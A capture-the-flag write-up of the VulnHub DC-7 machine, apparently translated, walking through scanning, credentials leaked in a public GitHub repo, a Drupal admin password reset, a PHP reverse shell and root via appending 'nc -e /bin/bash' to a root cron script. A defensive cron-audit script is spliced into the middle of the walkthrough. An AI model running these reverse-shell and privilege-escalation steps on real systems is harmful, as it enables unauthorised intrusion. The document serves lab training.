vulnhub——DC:7

Information gathering

┌──(root㉿anla)-[~]
└─# arp-scan -l
	Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245
	Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
	192.168.155.53  0a:0d:b0:31:80:4e       (Unknown: locally administered)
	192.168.155.227 30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
	192.168.155.230 08:00:27:70:30:17       PCS Systemtechnik GmbH

	10 packets received by filter, 0 packets dropped by kernel
	Ending arp-scan 1.10.0: 256 hosts scanned in 2.150 seconds (119.07 hosts/sec). 3 responded

┌──(root㉿anla)-[~]
└─# nmap 192.168.155.230
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 01:16 EDT
	Nmap scan report for 192.168.155.230
	Host is up (0.000061s latency).
	Not shown: 998 closed tcp ports (reset)
	PORT   STATE SERVICE
	22/tcp open  ssh
	80/tcp open  http
	MAC Address: 08:00:27:70:30:17 (Oracle VirtualBox virtual NIC)

	Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

┌──(root㉿anla)-[~]
└─# nmap -T4 -sS -p- -A 192.168.155.230
	Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 01:16 EDT
	Nmap scan report for 192.168.155.230
	Host is up (0.00017s latency).
	Not shown: 65533 closed tcp ports (reset)
	PORT   STATE SERVICE VERSION
	22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
	| ssh-hostkey:
	|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
	|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
	|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
	80/tcp open  http    Apache httpd 2.4.25 ((Debian))
	|_http-generator: Drupal 8 (https://www.drupal.org)
	|_http-server-header: Apache/2.4.25 (Debian)
	|_http-title: Welcome to DC-7 | D7
	| http-robots.txt: 22 disallowed entries (15 shown)
	| /core/ /profiles/ /README.txt /web.config /admin/
	| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
	| /user/password/ /user/login/ /user/logout/ /index.php/admin/
	|_/index.php/comment/reply/
	MAC Address: 08:00:27:70:30:17 (Oracle VirtualBox virtual NIC)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.2 - 4.9
	Network Distance: 1 hop
	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.17 ms 192.168.155.230

	OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds

Penetration

1. Obtain a low-privilege user shell through the web service

Visit the web service on port 80

# Welcome to DC-7

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box.  :-)


Searching Baidu for the "@DC7USER" shown at the very bottom of the page turns up a GitHub project

staffdb

This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.

This isn't a flag, btw, but if you have made it here, well done anyway. :-)


git clone https://github.com/Dc7User/staffdb and look at config.php among the files

└─# cat config.php
<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

But... the target does not expose a MySQL service, so try SSH

└─# ssh dc7user@192.168.155.230
The authenticity of host '192.168.155.230 (192.168.155.230)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.155.230' (ED25519) to the list of known hosts.
dc7user@192.168.155.230's password: 
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$ 

Tried SUID privilege escalation, without result

dc7user@dc-7:~/backups$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
dc7user@dc-7:~/backups$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/ping
/bin/umount
/bin/mount
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
dc7user@dc-7:~/backups$ sudo -l
-bash: sudo: command not found

2. Find a privilege-escalation path from file information

The mbox in the current directory shows that /opt/scripts/backups.sh is run periodically as root

/opt/scripts/backups.sh

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3LCo-0000Eb-02
	for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

Roughly, it means:

This text is an email notification sent by the system's cron daemon (scheduled tasks). When a cron job runs a script (here /opt/scripts/backups.sh), any output or errors it produces are mailed by the cron daemon.

A detailed breakdown of the text:

  1. Mail headers

    • From: the sender is root@dc-7, which means the job ran as the root user.
    • To: the recipient is also root@dc-7, so the mail is addressed to the system administrator.
    • Subject: the subject shows this is a cron job that ran the /opt/scripts/backups.sh script.
    • Date and time: the mail was sent at Fri, 30 Aug 2019 00:15:18 +1000.
  2. Mail body

    • rm command error:
    rm: cannot remove '/home/dc7user/backups/*': No such file or directory

    This shows the script tried to delete every file under /home/dc7user/backups/, but the directory or files did not exist.

    • Database backup succeeded:
    Database dump saved to /home/dc7user/backups/website.sql [success]

    This shows that although deleting the old backup files failed, the database was successfully dumped to /home/dc7user/backups/website.sql.

  3. Cron environment variables:

    • The X-Cron-Env lines show the environment variables in effect when the cron job ran. For example, PATH, SHELL, HOME and LOGNAME are system environment variables that define how the job executes.

backups.sh

View backups.sh

dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

Roughly:
The script /opt/scripts/backups.sh appears to back up the website's database and files. A line-by-line explanation:

#!/bin/bash

This line is the shebang; it tells the system to run the script with /bin/bash.

rm /home/dc7user/backups/*

This command deletes all files and directories under /home/dc7user/backups/. If the directory does not exist, you get an error message like the one seen in the mail notification.

cd /var/www/html/

This command changes the working directory to /var/www/html/, which is usually the web server's document root.

drush sql-dump --result-file=/home/dc7user/backups/website.sql

This command uses drush (probably a command-line tool for Drupal) to export the database and save the result to /home/dc7user/backups/website.sql. Note that there may be a spelling mistake here; whether it is drush or drush depends on what your system has installed.

cd ..

This command changes the working directory back up one level, i.e. to /var/www/.

tar -czf /home/dc7user/backups/website.tar.gz html/

This command creates a compressed archive named website.tar.gz containing the contents of the html/ directory.

gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql

This command uses GPG (GNU Privacy Guard) to symmetrically encrypt the database backup website.sql with the given passphrase PickYourOwnPassword. The --pinentry-mode loopback option supplies the passphrase from within the script instead of prompting the user interactively.

gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz

Like the previous line, this command symmetrically encrypts the archive website.tar.gz.

chown dc7user:dc7user /home/dc7user/backups/*

This command changes the ownership of all files and directories under /home/dc7user/backups/ to the user dc7user and group dc7user.

rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

The last two commands delete the unencrypted backups website.sql and website.tar.gz, since encrypted copies have already been saved in the same directory.

Exploitation

Addendum:
drush is a shell interface for managing Drupal from the server's command line.
It must be run inside the Drupal web directory (/var/www/[drupal_folder_name]).

Since the script runs with root privileges, writing a reverse-shell command into it is enough to obtain root. ls -al shows that the www-data user, i.e. the web server's user, has write permission on the script. So the next step is to get a reverse shell as the website user.

Looking up the drush commands shows that drush user-password <username> --password="<password>" changes a user's password. The Drupal site has a default administrator user named admin.
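The weakness described above (a root cron job running a script that www-data can write, with the gpg passphrase sitting in the script text) is easy to check for mechanically. The following is an added example, not code from the DC-7 machine or from this write-up: it reads /etc/crontab-style text, collects the commands that run as root, and audits each script for non-root write access and for an inline gpg passphrase. It assumes GNU coreutils stat and GNU find; the function names are my own.

```shell
#!/bin/sh
# Added example (not part of DC-7 or the original write-up): audit scripts that
# root's cron runs for the two weaknesses seen above: a non-root user such as
# www-data being able to modify the script or its directory, and a gpg
# passphrase written into the script text. Assumes GNU coreutils stat and find.

# Read /etc/crontab-style text on stdin and print the command path of every
# job that runs as root. Format: min hour dom mon dow user command...
# Comment lines, blank lines and VAR=value assignments are skipped.
root_cron_commands() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
        $6 == "root" { print $7 }
    '
}

# Print one finding per line for the script at $1; return the number of findings.
audit_cron_script() {
    script=$1
    findings=0
    if [ ! -f "$script" ]; then
        echo "MISSING: $script does not exist"
        return 1
    fi
    owner=$(stat -c '%U' "$script")
    if [ "$owner" != root ]; then
        echo "OWNER: $script is owned by $owner, not root"
        findings=$((findings + 1))
    fi
    # Group- or world-writable script: anyone in that group, or anyone at all,
    # can append commands that cron will then run as root (the DC-7 case).
    if [ -n "$(find "$script" -maxdepth 0 \( -perm -g=w -o -perm -o=w \) -print)" ]; then
        echo "WRITABLE: $script can be modified by non-owners"
        findings=$((findings + 1))
    fi
    # A writable parent directory lets the file be replaced wholesale.
    dir=$(dirname "$script")
    if [ -n "$(find "$dir" -maxdepth 0 \( -perm -g=w -o -perm -o=w \) -print)" ]; then
        echo "WRITABLE-DIR: $dir allows replacing $script"
        findings=$((findings + 1))
    fi
    # A passphrase on the gpg command line is readable by anyone who can read
    # the script, and shows up in the process list while gpg runs.
    if grep -Eq -- '--passphrase[[:space:]=]' "$script"; then
        echo "SECRET: $script embeds a gpg passphrase; use --passphrase-file with a mode 0600 file"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Audit every command the system crontab runs as root; 0 only if all are clean.
audit_system_crontab() {
    rc=0
    for cmd in $(root_cron_commands </etc/crontab); do
        audit_cron_script "$cmd" || rc=1
    done
    return "$rc"
}
```

Run audit_system_crontab as root on the host; on DC-7 it would flag /opt/scripts/backups.sh both as writable by www-data and for the inline passphrase.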

dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin 

Log in to the site as admin. Under Content you can add a new page, but there is no PHP code option. A search shows that Drupal 8 removed the PHP Filter module, leaving users who need it to install it manually.

Download the tar.gz package from https://www.drupal.org/project/php/releases/8.x-1.1, install and enable it under Extend, then go back to Content, create a new page containing <?php phpinfo(); ?>, and after saving it the phpinfo page is displayed.

For the reverse shell, use php-reverse-shell (a PHP reverse shell); just change the IP and port.

┌──(root㉿anla)-[~/staffdb]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.230: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.230] 33192
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 23:10:50 up  1:20,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 
Argument expected for the -c option
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-7:/$ ls
ls
bin   etc        initrd.img.old  lost+found  opt   run   sys  var
boot  home       lib              media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old
www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Write the reverse shell into the script, listen on the port, and after a fairly long wait the scheduled task fires and we get root (I used the same port here, so I first had to exit the current www-data shell)

www-data@dc-7:/$ echo 'nc -e /bin/bash 192.168.155.245 1234'>>/opt/scripts/backups.sh
<bash 192.168.155.245 1234'>>/opt/scripts/backups.sh
www-data@dc-7:/$ cat /opt/scripts/backups.sh
cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
nc -e /bin/bash 192.168.155.245 1234
www-data@dc-7:/$ ^C sent 161, rcvd 1455

┌──(root㉿anla)-[~/staffdb]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.230: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.230] 33194
python -c 'import pty; pty.spawn("/bin/bash")'
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dc-7:/var/www# cd /root
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt




888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@dc-7:~# 
